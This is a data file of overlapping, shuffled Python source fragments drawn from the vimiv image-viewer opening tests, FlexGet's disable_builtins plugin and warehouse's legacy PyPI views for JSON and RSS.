"\"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths())",
"the opening of different file-types with vimiv.\"\"\" import os from unittest import main",
"self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with a symlink to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\")",
"for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" #",
"= [os.path.abspath(image) for image in expected_images] for image in [os.path.abspath(im) for im in",
"def test_opening_with_whitespace(self): \"\"\"Open an image with whitespace and symlink in directory.\"\"\" expected_dir =",
"Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\",",
"= os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check moving and image population self.assertEqual(expected_dir,",
"def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" # Need to backup because we init",
"symlink in directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check moving",
"expected_images = [os.path.abspath(image) for image in expected_images] self.assertEqual(expected_images, self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all",
"for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open",
"to backup because we init in the wrong directory here working_dir = self.working_directory",
"a symlink to an image.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and",
"moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\",",
"= os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages/symlink_to_image\"]) # Check moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images =",
"images recursively.\"\"\" # Need to backup because we init in the wrong directory",
"in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image",
"Need to backup because we init in the wrong directory here working_dir =",
"\"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] for",
"\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an",
"class OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self):",
"in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open an image with whitespace and symlink",
"from vimiv_testcase import VimivTestCase class OpeningTest(VimivTestCase): \"\"\"Open with different file-types Test.\"\"\" @classmethod def",
"fileencoding=utf-8 sw=4 et sts=4 \"\"\"Test the opening of different file-types with vimiv.\"\"\" import",
"self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for image in",
"image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_symlink(self): \"\"\"Open with",
"image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\"] for",
"vim: ft=python fileencoding=utf-8 sw=4 et sts=4 \"\"\"Test the opening of different file-types with",
"moving and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"arch_001.jpg\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\",",
"\"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] for image in [os.path.abspath(im)",
"all images recursively.\"\"\" # Need to backup because we init in the wrong",
"self.assertEqual(8, len(self.vimiv.get_paths())) self.settings.reset() self.working_directory = working_dir def tearDown(self): self.vimiv.quit() os.chdir(self.working_directory) if __name__ ==",
"= os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\",",
"os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files = [\"animation\", \"arch-logo.png\", \"arch_001.jpg\", \"directory\", \"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\",",
"for image in [os.path.abspath(im) for im in expected_images]: self.assertIn(image, self.vimiv.get_paths()) def test_opening_with_whitespace(self): \"\"\"Open",
"directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages/directory/\") self.init_test([\"vimiv/testimages/directory/symlink with spaces .jpg\"]) # Check moving and image",
"\"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"] expected_images = [os.path.abspath(image) for image in expected_images] for image in",
"self.vimiv.get_paths()) def test_opening_recursively(self): \"\"\"Open all images recursively.\"\"\" # Need to backup because we",
"and image population self.assertEqual(expected_dir, os.getcwd()) expected_images = [\"symlink_to_image\", \"vimiv.bmp\", \"vimiv.svg\", \"vimiv.tiff\", \"arch-logo.png\", \"arch_001.jpg\"]",
"\"vimiv.svg\", \"vimiv.tiff\"] self.assertEqual(self.vimiv[\"library\"].files, expected_files) self.assertTrue(self.vimiv[\"library\"].is_focus()) self.assertTrue(self.vimiv[\"library\"].grid.is_visible()) def test_opening_with_image(self): \"\"\"Open with an image.\"\"\" expected_dir",
"\"\"\"Open with different file-types Test.\"\"\" @classmethod def setUpClass(cls): cls.init_test(cls) def test_opening_with_directory(self): \"\"\"Opening with",
"def test_opening_with_directory(self): \"\"\"Opening with a directory.\"\"\" expected_dir = os.path.abspath(\"vimiv/testimages\") self.init_test([\"vimiv/testimages\"]) self.assertEqual(expected_dir, os.getcwd()) expected_files"
] |
[
"self.disabled = [] # TODO: schemas are registered to a uri at plugin",
"is True or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s):",
"= { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum': [p.name",
"complete at that time schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array',",
"log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if",
"plugin(s): %s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort = on_task_exit register_plugin(PluginDisableBuiltins, 'disable_builtins',",
"config): self.disabled = [] if not config: return for plugin in all_builtins(): if",
"config: return for plugin in all_builtins(): if config is True or plugin.name in",
"import priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return",
"{'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}}",
"# cannot trust that on_task_start would have been executed self.disabled = [] #",
"config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255)",
"task.\"\"\" def __init__(self): # cannot trust that on_task_start would have been executed self.disabled",
"True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort =",
"a task.\"\"\" def __init__(self): # cannot trust that on_task_start would have been executed",
"on_task_start would have been executed self.disabled = [] # TODO: schemas are registered",
"be complete at that time schema = { 'oneOf': [ {'type': 'boolean'}, {'type':",
"\"\"\"Helper function to return an iterator over all builtin plugins.\"\"\" return (plugin for",
"plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not self.disabled:",
"schemas are registered to a uri at plugin load, the list of builtins",
"been executed self.disabled = [] # TODO: schemas are registered to a uri",
"to return an iterator over all builtin plugins.\"\"\" return (plugin for plugin in",
"to a uri at plugin load, the list of builtins will not be",
"plugins: %s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task,",
"load, the list of builtins will not be complete at that time schema",
"are registered to a uri at plugin load, the list of builtins will",
"'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}} ]",
"logging from flexget import plugin from flexget.plugin import priority, register_plugin, plugins log =",
"logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an iterator over all builtin plugins.\"\"\"",
"an iterator over all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if",
"(plugin for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific)",
"[ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in",
"from flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function",
"on_task_start(self, task, config): self.disabled = [] if not config: return for plugin in",
"builtin plugins from a task.\"\"\" def __init__(self): # cannot trust that on_task_start would",
"in all_builtins(): if config is True or plugin.name in config: plugin.builtin = False",
"import plugin from flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins():",
"self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config):",
"of builtins will not be complete at that time schema = { 'oneOf':",
"return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' %",
"log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort = on_task_exit",
"cannot trust that on_task_start would have been executed self.disabled = [] # TODO:",
"% ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled",
"PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a task.\"\"\" def __init__(self): #",
"flexget import plugin from flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins') def",
"def __init__(self): # cannot trust that on_task_start would have been executed self.disabled =",
"name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled))",
"executed self.disabled = [] # TODO: schemas are registered to a uri at",
"if config is True or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled",
"schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum':",
"import unicode_literals, division, absolute_import import logging from flexget import plugin from flexget.plugin import",
"plugin in all_builtins(): if config is True or plugin.name in config: plugin.builtin =",
"list of builtins will not be complete at that time schema = {",
"% ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not self.disabled: return for",
"for plugin in all_builtins(): if config is True or plugin.name in config: plugin.builtin",
"[] # TODO: schemas are registered to a uri at plugin load, the",
"registered to a uri at plugin load, the list of builtins will not",
"will not be complete at that time schema = { 'oneOf': [ {'type':",
"log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an iterator over all",
"return for plugin in all_builtins(): if config is True or plugin.name in config:",
"%s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not self.disabled: return",
"plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled = []",
"[p.name for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' %",
"return (plugin for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or",
"'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}} ] } def debug(self):",
"def on_task_start(self, task, config): self.disabled = [] if not config: return for plugin",
"%s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort = on_task_exit register_plugin(PluginDisableBuiltins, 'disable_builtins', api_ver=2)",
"plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an iterator over",
"all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object):",
"flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to",
"True or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s'",
"= [] if not config: return for plugin in all_builtins(): if config is",
"plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all",
"def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255)",
"builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not",
"'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p",
"= [] # TODO: schemas are registered to a uri at plugin load,",
"in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from",
"trust that on_task_start would have been executed self.disabled = [] # TODO: schemas",
"builtins will not be complete at that time schema = { 'oneOf': [",
"import logging from flexget import plugin from flexget.plugin import priority, register_plugin, plugins log",
"not be complete at that time schema = { 'oneOf': [ {'type': 'boolean'},",
"{'type': 'string', 'enum': [p.name for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin",
"register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an iterator",
"all_builtins(): if config is True or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name)",
"False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task,",
"', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled =",
"def all_builtins(): \"\"\"Helper function to return an iterator over all builtin plugins.\"\"\" return",
"over all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin) class",
"plugin load, the list of builtins will not be complete at that time",
"def on_task_exit(self, task, config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin",
"self.disabled = [] if not config: return for plugin in all_builtins(): if config",
"would have been executed self.disabled = [] # TODO: schemas are registered to",
"debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def",
"', '.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not self.disabled: return for name",
"plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins",
"iterator over all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin)",
"__future__ import unicode_literals, division, absolute_import import logging from flexget import plugin from flexget.plugin",
"division, absolute_import import logging from flexget import plugin from flexget.plugin import priority, register_plugin,",
"\"\"\"Disables all (or specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot",
"{'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}} ] }",
"the list of builtins will not be complete at that time schema =",
"plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ',",
"p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name",
"plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a task.\"\"\" def",
"@priority(255) def on_task_start(self, task, config): self.disabled = [] if not config: return for",
"[] if not config: return for plugin in all_builtins(): if config is True",
"(or specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot trust that",
"from __future__ import unicode_literals, division, absolute_import import logging from flexget import plugin from",
"unicode_literals, division, absolute_import import logging from flexget import plugin from flexget.plugin import priority,",
"'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}} ] } def",
"plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if not",
"for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin",
"'.join(self.disabled)) @priority(-255) def on_task_exit(self, task, config): if not self.disabled: return for name in",
"priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an",
"self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s'",
"for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ',",
"from flexget import plugin from flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins')",
"at plugin load, the list of builtins will not be complete at that",
"plugin from flexget.plugin import priority, register_plugin, plugins log = logging.getLogger('builtins') def all_builtins(): \"\"\"Helper",
"if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a task.\"\"\"",
"log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self,",
"if not config: return for plugin in all_builtins(): if config is True or",
"= False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def on_task_exit(self,",
"# TODO: schemas are registered to a uri at plugin load, the list",
"from a task.\"\"\" def __init__(self): # cannot trust that on_task_start would have been",
"task, config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True",
"all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin",
"task, config): self.disabled = [] if not config: return for plugin in all_builtins():",
"plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled)) @priority(-255) def",
"@priority(-255) def on_task_exit(self, task, config): if not self.disabled: return for name in self.disabled:",
"specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot trust that on_task_start",
"'.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = []",
"} def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins()))",
"not config: return for plugin in all_builtins(): if config is True or plugin.name",
"'enum': [p.name for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s'",
"config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled",
"if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin",
"plugins from a task.\"\"\" def __init__(self): # cannot trust that on_task_start would have",
"TODO: schemas are registered to a uri at plugin load, the list of",
"in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if not config:",
"%s' % ', '.join(plugin.name for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config):",
"on_task_exit(self, task, config): if not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin =",
"for plugin in all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if",
"all_builtins(): \"\"\"Helper function to return an iterator over all builtin plugins.\"\"\" return (plugin",
"for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ',",
"config is True or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin",
"builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables",
"in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled))",
"function to return an iterator over all builtin plugins.\"\"\" return (plugin for plugin",
"all (or specific) builtin plugins from a task.\"\"\" def __init__(self): # cannot trust",
"plugins.itervalues() if plugin.builtin) class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a",
"time schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string',",
"self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled =",
"builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort = on_task_exit register_plugin(PluginDisableBuiltins,",
"a uri at plugin load, the list of builtins will not be complete",
"{ 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string', 'enum': [p.name for",
"= logging.getLogger('builtins') def all_builtins(): \"\"\"Helper function to return an iterator over all builtin",
"class PluginDisableBuiltins(object): \"\"\"Disables all (or specific) builtin plugins from a task.\"\"\" def __init__(self):",
"that on_task_start would have been executed self.disabled = [] # TODO: schemas are",
"have been executed self.disabled = [] # TODO: schemas are registered to a",
"or plugin.name in config: plugin.builtin = False self.disabled.append(plugin.name) log.debug('Disabled builtin plugin(s): %s' %",
"absolute_import import logging from flexget import plugin from flexget.plugin import priority, register_plugin, plugins",
"__init__(self): # cannot trust that on_task_start would have been executed self.disabled = []",
"at that time schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items':",
"in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled",
"return an iterator over all builtin plugins.\"\"\" return (plugin for plugin in plugins.itervalues()",
"uri at plugin load, the list of builtins will not be complete at",
"that time schema = { 'oneOf': [ {'type': 'boolean'}, {'type': 'array', 'items': {'type':",
"'string', 'enum': [p.name for p in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins:",
"all_builtins())) @priority(255) def on_task_start(self, task, config): self.disabled = [] if not config: return",
"] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in",
"in all_builtins()]}} ] } def debug(self): log.debug('Builtin plugins: %s' % ', '.join(plugin.name for",
"not self.disabled: return for name in self.disabled: plugin.plugins[name].builtin = True log.debug('Enabled builtin plugin(s):",
"= True log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled)) self.disabled = [] on_task_abort"
] |
[
"url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request,",
"Most of the dispatch in legacy PyPI was implemented using a :action parameter",
"\"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name %r' % (name,",
"KIND, either express or implied. # See the License for the specific language",
"name %r' % (name, )) def deco(fn): _action_methods[name] = fn return fn return",
"Unless required by applicable law or agreed to in writing, software # distributed",
"necessary if callback: data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial()",
"response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the",
":action parameter in the GET or POST arguments. This doesn't actually decorate the",
"warehouse import fastly from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy",
"handler for a legacy :action style dispatch. Most of the dispatch in legacy",
"_action_methods: raise KeyError('Attempt to re-register name %r' % (name, )) def deco(fn): _action_methods[name]",
"when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response",
"specific language governing permissions and # limitations under the License. import json import",
"def deco(fn): _action_methods[name] = fn return fn return deco def pypi(app, request): #",
"using a :action parameter in the GET or POST arguments. This doesn't actually",
"return fn return deco def pypi(app, request): # check for the legacy :action-style",
"as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: #",
"raise KeyError('Attempt to re-register name %r' % (name, )) def deco(fn): _action_methods[name] =",
"= render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml;",
"response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1,",
"name') # Get the real project name for this project project = app.db.packaging.get_project(project_name)",
"N days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release",
"callback: data = '/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response =",
"is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP",
"we redirect to where it # moved to return redirect( url_for( request, \"warehouse.views.index\",",
"this file except in compliance with the License. # You may obtain a",
"), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\")",
"if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the",
"to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True)",
"is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for a legacy :action",
"url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects',",
"varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new projects as",
"a handler for a legacy :action style dispatch. Most of the dispatch in",
"<NAME> # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"request, project_name, version=None): # fail early if callback is invalid callback = request.args.get('callback')",
"response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified header too? return",
"request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO:",
"ANY KIND, either express or implied. # See the License for the specific",
"for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not",
"def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120)",
"project name for this project project = app.db.packaging.get_project(project_name) if project is None: raise",
"this project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not",
"def project_json(app, request, project_name, version=None): # fail early if callback is invalid callback",
"url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package",
"= 'text/xml; charset=utf-8' # TODO: throw in a last-modified header too? return response",
"render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8'",
"request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get",
"NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest version versions =",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N",
"def rss(app, request): \"\"\"Dump the last N days' updates as an RSS feed.",
"of the dispatch in legacy PyPI was implemented using a :action parameter in",
"warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates",
"app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking",
"response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app,",
"url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app,",
"data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial)",
"implemented using a :action parameter in the GET or POST arguments. This doesn't",
"= request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No :action means",
"request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No :action means we",
"\"\"\"Dump the last N days' new projects as an RSS feed. \"\"\" releases",
"OF ANY KIND, either express or implied. # See the License for the",
"version is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version =",
"= url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra crap if",
"request): \"\"\"Dump the last N days' updates as an RSS feed. \"\"\" releases",
"# Copyright 2013 <NAME> # # Licensed under the Apache License, Version 2.0",
"packages_rss(app, request): \"\"\"Dump the last N days' new projects as an RSS feed.",
"not exist\".format(project_name)) # we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if",
") response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified header too?",
"# TODO update _force_external to _external when Flask-ification is done url = url_for(request,",
"'%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items():",
"# moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app,",
"it simply registers it with the legacy routing mapping. \"\"\" if name in",
"is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') # Get the real project name for",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"= xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format",
"the dispatch in legacy PyPI was implemented using a :action parameter in the",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"name for this project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{}",
